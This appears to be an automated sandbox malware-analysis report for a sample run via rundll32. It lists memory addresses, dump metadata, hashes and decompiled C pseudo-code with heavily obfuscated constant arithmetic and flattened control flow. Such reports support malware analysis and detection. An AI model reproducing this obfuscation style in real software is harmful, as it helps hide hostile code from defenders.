                                                                                                                      0x00181541
                                                                                                                      0x00181549
                                                                                                                      0x0018154e
                                                                                                                      0x00181556
                                                                                                                      0x00181562
                                                                                                                      0x0018156a
                                                                                                                      0x0018156e
                                                                                                                      0x00181576
                                                                                                                      0x0018157e
                                                                                                                      0x00181583
                                                                                                                      0x0018158b
                                                                                                                      0x00181593
                                                                                                                      0x0018159b
                                                                                                                      0x001815a3
                                                                                                                      0x001815a3
                                                                                                                      0x001815ab
                                                                                                                      0x001815ab
                                                                                                                      0x001815ab
                                                                                                                      0x001815ab
                                                                                                                      0x001815ad
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x001815b3
                                                                                                                      0x0018176b
                                                                                                                      0x001815b9
                                                                                                                      0x001815bf
                                                                                                                      0x00181666
                                                                                                                      0x0018166b
                                                                                                                      0x0018166e
                                                                                                                      0x00000000
                                                                                                                      0x001815c5
                                                                                                                      0x001815cb
                                                                                                                      0x00181647
                                                                                                                      0x0018164c
                                                                                                                      0x0018164f
                                                                                                                      0x00000000
                                                                                                                      0x001815cd
                                                                                                                      0x001815d3
                                                                                                                      0x00181631
                                                                                                                      0x00181636
                                                                                                                      0x00181639
                                                                                                                      0x00000000
                                                                                                                      0x001815d5
                                                                                                                      0x001815db
                                                                                                                      0x00181616
                                                                                                                      0x0018161b
                                                                                                                      0x0018161e
                                                                                                                      0x00000000
                                                                                                                      0x001815dd
                                                                                                                      0x001815e3
                                                                                                                      0x00000000
                                                                                                                      0x001815e9
                                                                                                                      0x001815f8
                                                                                                                      0x001815fd
                                                                                                                      0x00181600
                                                                                                                      0x00000000
                                                                                                                      0x00181600
                                                                                                                      0x001815e3
                                                                                                                      0x001815db
                                                                                                                      0x001815d3
                                                                                                                      0x001815cb
                                                                                                                      0x001815bf
                                                                                                                      0x00181774
                                                                                                                      0x00181776
                                                                                                                      0x0018177a
                                                                                                                      0x0018177a
                                                                                                                      0x00181784
                                                                                                                      0x00181784
                                                                                                                      0x00181678
                                                                                                                      0x0018167e
                                                                                                                      0x0018173d
                                                                                                                      0x00181742
                                                                                                                      0x00181745
                                                                                                                      0x00000000
                                                                                                                      0x00181684
                                                                                                                      0x00181684
                                                                                                                      0x0018168a
                                                                                                                      0x0018171c
                                                                                                                      0x00181721
                                                                                                                      0x00181724
                                                                                                                      0x00000000
                                                                                                                      0x0018168c
                                                                                                                      0x0018168c
                                                                                                                      0x00181692
                                                                                                                      0x001816fc
                                                                                                                      0x001816ff
                                                                                                                      0x00000000
                                                                                                                      0x00181694
                                                                                                                      0x00181694
                                                                                                                      0x00181696
                                                                                                                      0x001816e3
                                                                                                                      0x001816e8
                                                                                                                      0x001816eb
                                                                                                                      0x00000000
                                                                                                                      0x00181698
                                                                                                                      0x00181698
                                                                                                                      0x0018169e
                                                                                                                      0x00000000
                                                                                                                      0x001816a4
                                                                                                                      0x001816b0
                                                                                                                      0x001816b1
                                                                                                                      0x001816b5
                                                                                                                      0x001816ba
                                                                                                                      0x001816be
                                                                                                                      0x001816c0
                                                                                                                      0x001816c6
                                                                                                                      0x00000000
                                                                                                                      0x001816c6
                                                                                                                      0x001816c0
                                                                                                                      0x0018169e
                                                                                                                      0x00181696
                                                                                                                      0x00181692
                                                                                                                      0x0018168a
                                                                                                                      0x00000000
                                                                                                                      0x0018174a
                                                                                                                      0x0018174a
                                                                                                                      0x0018174a
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Fax%$gU$$F$T$^#$^#
                                                                                                                      • API String ID: 0-2311862416
                                                                                                                      • Opcode ID: ec0ed06aba5dba57669efc6d06ae299f3cdbf4a225dd5178920b32f9c929715b
                                                                                                                      • Instruction ID: d3cf39b6bcd7fac94604d7c0dfadea08961fd86b09fed1bfdbc3910bd42b54bc
                                                                                                                      • Opcode Fuzzy Hash: ec0ed06aba5dba57669efc6d06ae299f3cdbf4a225dd5178920b32f9c929715b
                                                                                                                      • Instruction Fuzzy Hash: DEC143725087419FC768DF64C88941FBBE2FBD5718F144A1DF68686260D3B58A49CF83
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 74%
                                                                                                                      			E0018363D(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a28) {
                                                                                                                      				intOrPtr _v60;
                                                                                                                      				char _v68;
                                                                                                                      				char _v72;
                                                                                                                      				signed int _v76;
                                                                                                                      				signed int _v80;
                                                                                                                      				signed int _v84;
                                                                                                                      				signed int _v88;
                                                                                                                      				signed int _v92;
                                                                                                                      				signed int _v96;
                                                                                                                      				signed int _v100;
                                                                                                                      				signed int _v104;
                                                                                                                      				signed int _v108;
                                                                                                                      				signed int _v112;
                                                                                                                      				signed int _v116;
                                                                                                                      				signed int _v120;
                                                                                                                      				signed int _v124;
                                                                                                                      				signed int _v128;
                                                                                                                      				signed int _v132;
                                                                                                                      				signed int _v136;
                                                                                                                      				signed int _v140;
                                                                                                                      				signed int _v144;
                                                                                                                      				signed int _v148;
                                                                                                                      				signed int _v152;
                                                                                                                      				signed int _v156;
                                                                                                                      				signed int _v160;
                                                                                                                      				signed int _v164;
                                                                                                                      				signed int _v168;
                                                                                                                      				signed int _v172;
                                                                                                                      				signed int _v176;
                                                                                                                      				char _t264;
                                                                                                                      				signed int _t295;
                                                                                                                      				signed int _t298;
                                                                                                                      				signed int _t299;
                                                                                                                      				signed int _t300;
                                                                                                                      				signed int _t301;
                                                                                                                      				signed int _t302;
                                                                                                                      				signed int _t303;
                                                                                                                      				signed int _t304;
                                                                                                                      				void* _t307;
                                                                                                                      				void* _t308;
                                                                                                                      				void* _t334;
                                                                                                                      				intOrPtr _t335;
                                                                                                                      				signed int* _t338;
                                                                                                                      
                                                                                                                      				_push(_a28);
                                                                                                                      				_t334 = __ecx;
                                                                                                                      				_push(0);
                                                                                                                      				_push(_a20);
                                                                                                                      				_push(_a16);
                                                                                                                      				_push(_a12);
                                                                                                                      				_push(_a8);
                                                                                                                      				_push(_a4);
                                                                                                                      				_push(0);
                                                                                                                      				_push(__ecx);
                                                                                                                      				_t264 = E0017CF25(0);
                                                                                                                      				_v72 = _t264;
                                                                                                                      				_t335 = _t264;
                                                                                                                      				_v124 = 0xc44be;
                                                                                                                      				_t338 =  &(( &_v176)[9]);
                                                                                                                      				_v124 = _v124 + 0xffff24c4;
                                                                                                                      				_t307 = 0xc36eaf9;
                                                                                                                      				_t298 = 0x37;
                                                                                                                      				_v124 = _v124 * 0x2e;
                                                                                                                      				_v124 = _v124 ^ 0x020cf15c;
                                                                                                                      				_v176 = 0xedca77;
                                                                                                                      				_v176 = _v176 * 0x1f;
                                                                                                                      				_v176 = _v176 << 4;
                                                                                                                      				_v176 = _v176 + 0xdbf9;
                                                                                                                      				_v176 = _v176 ^ 0xccb922a9;
                                                                                                                      				_v120 = 0x5a606;
                                                                                                                      				_v120 = _v120 | 0xc9e49228;
                                                                                                                      				_t299 = 0x62;
                                                                                                                      				_v120 = _v120 / _t298;
                                                                                                                      				_v120 = _v120 ^ 0x03ad0d8c;
                                                                                                                      				_v144 = 0x918442;
                                                                                                                      				_v144 = _v144 >> 0xd;
                                                                                                                      				_v144 = _v144 * 0x3e;
                                                                                                                      				_v144 = _v144 + 0xa3d5;
                                                                                                                      				_v144 = _v144 ^ 0x0007140c;
                                                                                                                      				_v88 = 0x37923f;
                                                                                                                      				_v88 = _v88 ^ 0x32449291;
                                                                                                                      				_v88 = _v88 ^ 0x3276c44e;
                                                                                                                      				_v168 = 0xa5175f;
                                                                                                                      				_v168 = _v168 + 0x6cd0;
                                                                                                                      				_v168 = _v168 >> 0xd;
                                                                                                                      				_v168 = _v168 + 0x50d;
                                                                                                                      				_v168 = _v168 ^ 0x000b28ed;
                                                                                                                      				_v96 = 0x8bb9e8;
                                                                                                                      				_v96 = _v96 ^ 0x9313002a;
                                                                                                                      				_v96 = _v96 ^ 0x93929827;
                                                                                                                      				_v128 = 0x9b97bd;
                                                                                                                      				_v128 = _v128 >> 9;
                                                                                                                      				_v128 = _v128 + 0x506c;
                                                                                                                      				_v128 = _v128 ^ 0x0008f405;
                                                                                                                      				_v136 = 0x162b;
                                                                                                                      				_v136 = _v136 << 0xe;
                                                                                                                      				_v136 = _v136 ^ 0xcbe41246;
                                                                                                                      				_v136 = _v136 ^ 0xce6e1682;
                                                                                                                      				_v160 = 0xb72d70;
                                                                                                                      				_v160 = _v160 >> 8;
                                                                                                                      				_v160 = _v160 ^ 0x815bd7a2;
                                                                                                                      				_v160 = _v160 ^ 0x177336f3;
                                                                                                                      				_v160 = _v160 ^ 0x962c98d3;
                                                                                                                      				_v100 = 0xe545e5;
                                                                                                                      				_v100 = _v100 + 0xffffaae8;
                                                                                                                      				_v100 = _v100 | 0x514a639c;
                                                                                                                      				_v100 = _v100 ^ 0x51eea269;
                                                                                                                      				_v152 = 0xd9d32c;
                                                                                                                      				_v152 = _v152 >> 8;
                                                                                                                      				_v152 = _v152 ^ 0x78b07b8d;
                                                                                                                      				_v152 = _v152 / _t299;
                                                                                                                      				_v152 = _v152 ^ 0x01343475;
                                                                                                                      				_v92 = 0x6219a9;
                                                                                                                      				_v92 = _v92 << 8;
                                                                                                                      				_v92 = _v92 ^ 0x6210c938;
                                                                                                                      				_v80 = 0x3ff2a1;
                                                                                                                      				_v80 = _v80 + 0xffff7ea3;
                                                                                                                      				_v80 = _v80 ^ 0x003f2f73;
                                                                                                                      				_v164 = 0xe5565b;
                                                                                                                      				_v164 = _v164 + 0xffff5b62;
                                                                                                                      				_t300 = 0x78;
                                                                                                                      				_v164 = _v164 * 6;
                                                                                                                      				_v164 = _v164 / _t300;
                                                                                                                      				_v164 = _v164 ^ 0x000727eb;
                                                                                                                      				_v76 = 0x250d2;
                                                                                                                      				_v76 = _v76 | 0x8f851c12;
                                                                                                                      				_v76 = _v76 ^ 0x8f8220e2;
                                                                                                                      				_v116 = 0x568e;
                                                                                                                      				_v116 = _v116 ^ 0x3d61f204;
                                                                                                                      				_v116 = _v116 << 7;
                                                                                                                      				_v116 = _v116 ^ 0xb0d54eba;
                                                                                                                      				_v172 = 0xa5a4a3;
                                                                                                                      				_v172 = _v172 | 0xd2f7b266;
                                                                                                                      				_v172 = _v172 >> 0xd;
                                                                                                                      				_t301 = 0x7f;
                                                                                                                      				_v172 = _v172 * 0x30;
                                                                                                                      				_v172 = _v172 ^ 0x0132b547;
                                                                                                                      				_v112 = 0xd0329d;
                                                                                                                      				_v112 = _v112 * 0x58;
                                                                                                                      				_v112 = _v112 << 3;
                                                                                                                      				_v112 = _v112 ^ 0x3c81866c;
                                                                                                                      				_v104 = 0x844e69;
                                                                                                                      				_v104 = _v104 << 0xc;
                                                                                                                      				_v104 = _v104 >> 4;
                                                                                                                      				_v104 = _v104 ^ 0x0443b556;
                                                                                                                      				_v84 = 0x1d6374;
                                                                                                                      				_v84 = _v84 >> 0xd;
                                                                                                                      				_v84 = _v84 ^ 0x000df0de;
                                                                                                                      				_v148 = 0x6585fd;
                                                                                                                      				_v148 = _v148 / _t301;
                                                                                                                      				_t302 = 0x77;
                                                                                                                      				_v148 = _v148 / _t302;
                                                                                                                      				_v148 = _v148 >> 0xa;
                                                                                                                      				_v148 = _v148 ^ 0x000a9d1a;
                                                                                                                      				_v156 = 0xff5a31;
                                                                                                                      				_v156 = _v156 + 0xce45;
                                                                                                                      				_t303 = 0x29;
                                                                                                                      				_v156 = _v156 / _t303;
                                                                                                                      				_v156 = _v156 << 1;
                                                                                                                      				_v156 = _v156 ^ 0x0008392b;
                                                                                                                      				_v132 = 0x13d5b5;
                                                                                                                      				_v132 = _v132 << 0x10;
                                                                                                                      				_v132 = _v132 + 0xffff95f7;
                                                                                                                      				_v132 = _v132 ^ 0xd5b1b27f;
                                                                                                                      				_v108 = 0x3556bb;
                                                                                                                      				_v108 = _v108 * 0x4f;
                                                                                                                      				_v108 = _v108 + 0xffff90f3;
                                                                                                                      				_v108 = _v108 ^ 0x10791788;
                                                                                                                      				_v140 = 0x81de0d;
                                                                                                                      				_t304 = 0x6d;
                                                                                                                      				_v140 = _v140 / _t304;
                                                                                                                      				_v140 = _v140 + 0xf4b;
                                                                                                                      				_v140 = _v140 * 0x26;
                                                                                                                      				_v140 = _v140 ^ 0x002a9917;
                                                                                                                      				do {
                                                                                                                      					while(_t307 != 0x688d2d5) {
                                                                                                                      						if(_t307 == 0x8a4f536) {
                                                                                                                      							_t295 = E00185B0E(_a28, _v120,  &_v72, _v144);
                                                                                                                      							_t338 =  &(_t338[3]);
                                                                                                                      							__eflags = _t295;
                                                                                                                      							if(_t295 != 0) {
                                                                                                                      								_t307 = 0x688d2d5;
                                                                                                                      								continue;
                                                                                                                      							}
                                                                                                                      						} else {
                                                                                                                      							if(_t307 == 0x94a3104) {
                                                                                                                      								E00176E34(_v132, _v72, _v108, _v140);
                                                                                                                      							} else {
                                                                                                                      								if(_t307 != 0xc36eaf9) {
                                                                                                                      									goto L9;
                                                                                                                      								} else {
                                                                                                                      									_t307 = 0x8a4f536;
                                                                                                                      									continue;
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      						L12:
                                                                                                                      						return _t335;
                                                                                                                      					}
                                                                                                                      					_push(_v128);
                                                                                                                      					_push(_v96);
                                                                                                                      					_push(_v168);
                                                                                                                      					_push(_v88);
                                                                                                                      					_t308 = 0x44;
                                                                                                                      					E00191310(_t308,  &_v68);
                                                                                                                      					_push(_v152);
                                                                                                                      					_v68 = 0x44;
                                                                                                                      					_push(_v100);
                                                                                                                      					_t309 = _v136;
                                                                                                                      					_push(0x171800);
                                                                                                                      					_v60 = E0017AB66(_v136, _v160, __eflags);
                                                                                                                      					__eflags = _v176 | _v124;
                                                                                                                      					_t335 = E0018C8BD(_v92, _v136, _v80, _v136, _t309, _v164, _v76, _a20, _v116, _t334, _a28, _v172, _v176 | _v124, 0, _v112,  &_v68, _v72, _v104);
                                                                                                                      					E0017AE03(_v84, _v148, _v156, _v60);
                                                                                                                      					_t338 =  &(_t338[0x1a]);
                                                                                                                      					_t307 = 0x94a3104;
                                                                                                                      					L9:
                                                                                                                      					__eflags = _t307 - 0xce6287b;
                                                                                                                      				} while (_t307 != 0xce6287b);
                                                                                                                      				goto L12;
                                                                                                                      			}














































                                                                                                                      0x001838c0
                                                                                                                      0x001838c8
                                                                                                                      0x001838d2
                                                                                                                      0x001838d5
                                                                                                                      0x001838d9
                                                                                                                      0x001838e1
                                                                                                                      0x001838ee
                                                                                                                      0x001838f2
                                                                                                                      0x001838f7
                                                                                                                      0x001838ff
                                                                                                                      0x00183907
                                                                                                                      0x0018390c
                                                                                                                      0x00183911
                                                                                                                      0x00183919
                                                                                                                      0x00183921
                                                                                                                      0x00183926
                                                                                                                      0x0018392e
                                                                                                                      0x0018393e
                                                                                                                      0x00183946
                                                                                                                      0x0018394b
                                                                                                                      0x00183951
                                                                                                                      0x00183956
                                                                                                                      0x0018395e
                                                                                                                      0x00183966
                                                                                                                      0x00183972
                                                                                                                      0x00183975
                                                                                                                      0x00183979
                                                                                                                      0x0018397d
                                                                                                                      0x00183985
                                                                                                                      0x0018398d
                                                                                                                      0x00183992
                                                                                                                      0x0018399a
                                                                                                                      0x001839a2
                                                                                                                      0x001839af
                                                                                                                      0x001839b3
                                                                                                                      0x001839bb
                                                                                                                      0x001839c3
                                                                                                                      0x001839d8
                                                                                                                      0x001839e0
                                                                                                                      0x001839e4
                                                                                                                      0x001839f1
                                                                                                                      0x001839f5
                                                                                                                      0x001839fd
                                                                                                                      0x001839fd
                                                                                                                      0x00183a03
                                                                                                                      0x00183a35
                                                                                                                      0x00183a3a
                                                                                                                      0x00183a3d
                                                                                                                      0x00183a3f
                                                                                                                      0x00183a45
                                                                                                                      0x00000000
                                                                                                                      0x00183a45
                                                                                                                      0x00183a05
                                                                                                                      0x00183a0b
                                                                                                                      0x00183b31
                                                                                                                      0x00183a11
                                                                                                                      0x00183a17
                                                                                                                      0x00000000
                                                                                                                      0x00183a1d
                                                                                                                      0x00183a1d
                                                                                                                      0x00000000
                                                                                                                      0x00183a1d
                                                                                                                      0x00183a17
                                                                                                                      0x00183a0b
                                                                                                                      0x00183b39
                                                                                                                      0x00183b44
                                                                                                                      0x00183b44
                                                                                                                      0x00183a49
                                                                                                                      0x00183a54
                                                                                                                      0x00183a58
                                                                                                                      0x00183a5c
                                                                                                                      0x00183a62
                                                                                                                      0x00183a63
                                                                                                                      0x00183a68
                                                                                                                      0x00183a6c
                                                                                                                      0x00183a77
                                                                                                                      0x00183a7f
                                                                                                                      0x00183a83
                                                                                                                      0x00183a90
                                                                                                                      0x00183aac
                                                                                                                      0x00183af2
                                                                                                                      0x00183b03
                                                                                                                      0x00183b08
                                                                                                                      0x00183b0b
                                                                                                                      0x00183b10
                                                                                                                      0x00183b10
                                                                                                                      0x00183b10
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: *$D$[V$lP$s/?$E
                                                                                                                      • API String ID: 0-4039435091
                                                                                                                      • Opcode ID: 4110c5fb5a22a2dd88b0446ca4237de5dede076b2eb902c849a41d2ab06dadb1
                                                                                                                      • Instruction ID: eb9896144b2c8420fe777e414bcd6f4142039eec8a23f85e40344cc8d5601d95
                                                                                                                      • Opcode Fuzzy Hash: 4110c5fb5a22a2dd88b0446ca4237de5dede076b2eb902c849a41d2ab06dadb1
                                                                                                                      • Instruction Fuzzy Hash: E7C11F715083809FD368CF64C98AA1BFBE1FBD8748F509A1DF69596260C7B58A48CF43
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 90%
                                                                                                                      			E001788F4(void* __ecx) {
                                                                                                                      				char _v520;
                                                                                                                      				char _v1040;
                                                                                                                      				char _v1560;
                                                                                                                      				signed int _v1564;
                                                                                                                      				signed int _v1568;
                                                                                                                      				signed int _v1572;
                                                                                                                      				signed int _v1576;
                                                                                                                      				signed int _v1580;
                                                                                                                      				signed int _v1584;
                                                                                                                      				signed int _v1588;
                                                                                                                      				signed int _v1592;
                                                                                                                      				signed int _v1596;
                                                                                                                      				signed int _v1600;
                                                                                                                      				signed int _v1604;
                                                                                                                      				signed int _v1608;
                                                                                                                      				signed int _v1612;
                                                                                                                      				signed int _v1616;
                                                                                                                      				signed int _v1620;
                                                                                                                      				signed int _v1624;
                                                                                                                      				signed int _v1628;
                                                                                                                      				signed int _v1632;
                                                                                                                      				signed int _v1636;
                                                                                                                      				signed int _v1640;
                                                                                                                      				signed int _v1644;
                                                                                                                      				signed int _v1648;
                                                                                                                      				signed int _v1652;
                                                                                                                      				signed int _v1656;
                                                                                                                      				signed int _v1660;
                                                                                                                      				signed int _v1664;
                                                                                                                      				signed int _v1668;
                                                                                                                      				signed int _t258;
                                                                                                                      				signed int _t271;
                                                                                                                      				signed int _t272;
                                                                                                                      				signed int _t273;
                                                                                                                      				signed int _t274;
                                                                                                                      				signed int _t275;
                                                                                                                      				signed int _t276;
                                                                                                                      				void* _t303;
                                                                                                                      				void* _t304;
                                                                                                                      				signed int* _t307;
                                                                                                                      
                                                                                                                      				_t307 =  &_v1668;
                                                                                                                      				_v1644 = 0x34739e;
                                                                                                                      				_v1644 = _v1644 * 0x43;
                                                                                                                      				_t303 = __ecx;
                                                                                                                      				_v1644 = _v1644 >> 0xb;
                                                                                                                      				_t304 = 0x422d362;
                                                                                                                      				_t271 = 0x7d;
                                                                                                                      				_v1644 = _v1644 / _t271;
                                                                                                                      				_v1644 = _v1644 ^ 0x00084d9c;
                                                                                                                      				_v1612 = 0xb20ebf;
                                                                                                                      				_v1612 = _v1612 << 0xe;
                                                                                                                      				_v1612 = _v1612 ^ 0x83a04dde;
                                                                                                                      				_v1580 = 0xaa66ba;
                                                                                                                      				_v1580 = _v1580 + 0xffff0111;
                                                                                                                      				_v1580 = _v1580 ^ 0x00ac31ef;
                                                                                                                      				_v1604 = 0x4a91ac;
                                                                                                                      				_v1604 = _v1604 | 0x86032005;
                                                                                                                      				_v1604 = _v1604 ^ 0x86453654;
                                                                                                                      				_v1660 = 0x3cdcbf;
                                                                                                                      				_t272 = 0x34;
                                                                                                                      				_v1660 = _v1660 / _t272;
                                                                                                                      				_v1660 = _v1660 << 9;
                                                                                                                      				_t273 = 0x19;
                                                                                                                      				_v1660 = _v1660 * 0x33;
                                                                                                                      				_v1660 = _v1660 ^ 0x776ddfce;
                                                                                                                      				_v1620 = 0xfdfe87;
                                                                                                                      				_v1620 = _v1620 | 0x8debc5e9;
                                                                                                                      				_v1620 = _v1620 ^ 0x8df4241a;
                                                                                                                      				_v1596 = 0xc5e4de;
                                                                                                                      				_v1596 = _v1596 / _t273;
                                                                                                                      				_v1596 = _v1596 ^ 0x000ab9e2;
                                                                                                                      				_v1568 = 0x4c47da;
                                                                                                                      				_v1568 = _v1568 + 0x5d3c;
                                                                                                                      				_v1568 = _v1568 ^ 0x0043a9f3;
                                                                                                                      				_v1564 = 0xed5f6a;
                                                                                                                      				_t274 = 0x2a;
                                                                                                                      				_v1564 = _v1564 / _t274;
                                                                                                                      				_v1564 = _v1564 ^ 0x00049b09;
                                                                                                                      				_v1588 = 0xe27f75;
                                                                                                                      				_t275 = 0x68;
                                                                                                                      				_v1588 = _v1588 * 0x15;
                                                                                                                      				_v1588 = _v1588 ^ 0x129f57f0;
                                                                                                                      				_v1572 = 0x58913e;
                                                                                                                      				_v1572 = _v1572 + 0xffff0520;
                                                                                                                      				_v1572 = _v1572 ^ 0x005b93ab;
                                                                                                                      				_v1648 = 0xac4e73;
                                                                                                                      				_v1648 = _v1648 >> 8;
                                                                                                                      				_v1648 = _v1648 >> 0x10;
                                                                                                                      				_v1648 = _v1648 << 3;
                                                                                                                      				_v1648 = _v1648 ^ 0x000ac3bf;
                                                                                                                      				_v1668 = 0x5a6a4e;
                                                                                                                      				_t90 =  &_v1668; // 0x5a6a4e
                                                                                                                      				_v1668 =  *_t90 * 0x58;
                                                                                                                      				_t92 =  &_v1668; // 0x5a6a4e
                                                                                                                      				_v1668 =  *_t92 / _t275;
                                                                                                                      				_v1668 = _v1668 << 1;
                                                                                                                      				_v1668 = _v1668 ^ 0x009738dd;
                                                                                                                      				_v1640 = 0x7a6607;
                                                                                                                      				_t276 = 0x65;
                                                                                                                      				_v1640 = _v1640 * 0xa;
                                                                                                                      				_v1640 = _v1640 >> 9;
                                                                                                                      				_v1640 = _v1640 | 0xf246f931;
                                                                                                                      				_v1640 = _v1640 ^ 0xf242cc5d;
                                                                                                                      				_v1628 = 0xa390c8;
                                                                                                                      				_v1628 = _v1628 << 0xf;
                                                                                                                      				_v1628 = _v1628 ^ 0x3ac7d651;
                                                                                                                      				_v1628 = _v1628 ^ 0xf2afedad;
                                                                                                                      				_v1652 = 0x2d980b;
                                                                                                                      				_v1652 = _v1652 * 0x71;
                                                                                                                      				_v1652 = _v1652 * 0x17;
                                                                                                                      				_v1652 = _v1652 ^ 0x28f4da4d;
                                                                                                                      				_v1652 = _v1652 ^ 0xe6141d35;
                                                                                                                      				_v1636 = 0x37785c;
                                                                                                                      				_v1636 = _v1636 + 0xffffcffd;
                                                                                                                      				_v1636 = _v1636 ^ 0x6b7d5c73;
                                                                                                                      				_v1636 = _v1636 ^ 0x6b457d84;
                                                                                                                      				_v1616 = 0xb1620;
                                                                                                                      				_v1616 = _v1616 << 0x10;
                                                                                                                      				_v1616 = _v1616 ^ 0x162b8e46;
                                                                                                                      				_v1632 = 0x4c47;
                                                                                                                      				_v1632 = _v1632 + 0xffffc0f0;
                                                                                                                      				_v1632 = _v1632 + 0xffffd3bf;
                                                                                                                      				_v1632 = _v1632 ^ 0xfff44e1b;
                                                                                                                      				_v1664 = 0xa6b80c;
                                                                                                                      				_v1664 = _v1664 + 0xf763;
                                                                                                                      				_v1664 = _v1664 * 0x6e;
                                                                                                                      				_v1664 = _v1664 / _t276;
                                                                                                                      				_v1664 = _v1664 ^ 0x00b9c638;
                                                                                                                      				_v1600 = 0xaa0054;
                                                                                                                      				_v1600 = _v1600 ^ 0xf2e3595a;
                                                                                                                      				_v1600 = _v1600 ^ 0xf24e3ce3;
                                                                                                                      				_v1608 = 0x669547;
                                                                                                                      				_v1608 = _v1608 + 0xe3ee;
                                                                                                                      				_v1608 = _v1608 ^ 0x0066aeed;
                                                                                                                      				_v1656 = 0xf50b8d;
                                                                                                                      				_v1656 = _v1656 + 0xffffe5b9;
                                                                                                                      				_v1656 = _v1656 * 0x19;
                                                                                                                      				_v1656 = _v1656 * 0x2c;
                                                                                                                      				_v1656 = _v1656 ^ 0x1c789090;
                                                                                                                      				_v1576 = 0xf13773;
                                                                                                                      				_v1576 = _v1576 | 0xffe45fc0;
                                                                                                                      				_v1576 = _v1576 ^ 0xfffeb9af;
                                                                                                                      				_v1624 = 0xc714fc;
                                                                                                                      				_v1624 = _v1624 << 7;
                                                                                                                      				_v1624 = _v1624 * 0x4d;
                                                                                                                      				_v1624 = _v1624 ^ 0xf0acb0c0;
                                                                                                                      				_v1584 = 0x43b9ac;
                                                                                                                      				_v1584 = _v1584 + 0xfffff1bc;
                                                                                                                      				_v1584 = _v1584 ^ 0x004aa621;
                                                                                                                      				_v1592 = 0x5bf493;
                                                                                                                      				_t258 = _v1592 * 0x43;
                                                                                                                      				_v1592 = _t258;
                                                                                                                      				_v1592 = _v1592 ^ 0x181e9f62;
                                                                                                                      				while(_t304 != 0x2953b22) {
                                                                                                                      					if(_t304 == 0x422d362) {
                                                                                                                      						_t304 = 0xe704baa;
                                                                                                                      						continue;
                                                                                                                      					} else {
                                                                                                                      						_t312 = _t304 - 0xe704baa;
                                                                                                                      						if(_t304 != 0xe704baa) {
                                                                                                                      							L8:
                                                                                                                      							__eflags = _t304 - 0x740d40c;
                                                                                                                      							if(__eflags != 0) {
                                                                                                                      								continue;
                                                                                                                      							}
                                                                                                                      						} else {
                                                                                                                      							E001912A8(_t276, _v1644, _t312, _v1612, _v1580,  &_v1560);
                                                                                                                      							 *((short*)(E00184FA8(_v1604,  &_v1560, _v1660, _v1620))) = 0;
                                                                                                                      							E00178650(_v1596,  &_v520, _t312, _v1568);
                                                                                                                      							_push(_v1648);
                                                                                                                      							_push(_v1572);
                                                                                                                      							_push(0x17183c);
                                                                                                                      							E0017E7CE(E0017AB66(_v1564, _v1588, _t312), _t312, _v1668,  &_v1560, _v1564, _v1640, _v1628, _v1652, _v1636,  &_v520);
                                                                                                                      							E0017AE03(_v1616, _v1632, _v1664, _t264);
                                                                                                                      							_t276 = _v1600;
                                                                                                                      							_t258 = E0018C38F(_t276,  &_v1040, _t303, _v1608);
                                                                                                                      							_t307 =  &(_t307[0x15]);
                                                                                                                      							if(_t258 != 0) {
                                                                                                                      								_t304 = 0x2953b22;
                                                                                                                      								continue;
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      					}
                                                                                                                      					return _t258;
                                                                                                                      				}
                                                                                                                      				_push(_v1592);
                                                                                                                      				_push(_v1584);
                                                                                                                      				_push(_v1624);
                                                                                                                      				_push( &_v1040);
                                                                                                                      				_push(0);
                                                                                                                      				_push(_v1576);
                                                                                                                      				_push(_t276);
                                                                                                                      				_push(0);
                                                                                                                      				_t276 = 0;
                                                                                                                      				__eflags = 0;
                                                                                                                      				_t258 = E00179700(0, _v1656, 0);
                                                                                                                      				_t307 =  &(_t307[8]);
                                                                                                                      				_t304 = 0x740d40c;
                                                                                                                      				goto L8;
                                                                                                                      			}











































                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: <]$GL$NjZ$T$j_$s\}k
                                                                                                                      • API String ID: 0-1588241565
                                                                                                                      • Opcode ID: 12f6af15288137ab8395320d4a41eeea58601aee8cec5df1abd2f05953039872
                                                                                                                      • Instruction ID: bf74148d8f2833b4502b4d94013921590200d9f662f7f31258f44149dc9e2ff7
